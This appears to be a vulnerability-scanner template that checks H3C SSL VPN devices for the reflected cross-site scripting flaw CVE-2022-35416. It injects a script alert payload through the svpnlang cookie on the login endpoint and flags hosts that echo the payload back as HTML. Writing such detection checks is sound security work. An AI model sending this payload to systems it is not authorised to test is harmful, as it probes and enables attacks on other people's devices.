H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416 - Cross-Site Scripting
id: CVE-2022-35416

info:
  name: H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416 - Cross-Site Scripting
  author: 0x240x23elu
  severity: medium
  reference:
    - https://github.com/safe3s/CVE-2022-35416
  tags: H3C,xss

# Sends one request to the login endpoint with a marker in the svpnlang cookie.
# All three matchers must hold (matchers-condition: and) for a finding.
requests:
  - raw:
      - |
        GET /wnm/login/login.json HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Cookie: svpnlang=<script>alert('XSS')</script>

    matchers-condition: and
    matchers:
      # The cookie value is reflected in the response body without encoding.
      - type: word
        words:
          - "<script>alert('XSS')</script>"
        part: body

      # The request was served successfully.
      - type: status
        status:
          - 200

      # The response is served as HTML, so a browser would parse the reflected markup.
      - type: word
        words:
          - "text/html"
        part: header